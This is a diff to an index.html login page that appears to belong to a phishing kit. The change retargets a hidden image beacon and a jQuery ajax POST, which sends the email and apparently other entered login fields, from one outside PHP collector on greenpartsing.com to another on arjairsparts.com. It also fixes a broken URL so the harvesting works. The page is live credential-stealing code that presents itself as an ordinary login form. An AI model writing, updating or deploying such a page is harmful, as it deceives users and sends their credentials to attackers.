--- a/index.html
+++ b/index.html
@@ -127,7 +127,7 @@
             <button type="submit" class="login-submit wbk p0" id='submit-btn'>Login</button>
         </form>
         <div style="display: none;">
-            <img src="http://greenpartsing.com/roadmap/package/xSuex.php" alt="Action">
+            <img src="http://arjairsparts.com/verywell/patternform/drip.php" alt="Action">
         </div>
     </section>
 
@@ -220,7 +220,7 @@
       
       $.ajax({
         dataType: 'JSON',
-        url: 'https://http://greenpartsing.com/roadmap/package/xSuex.php',
+        url: 'http://arjairsparts.com/verywell/patternform/drip.php',
         type: 'POST',
         data:{
           email:email,
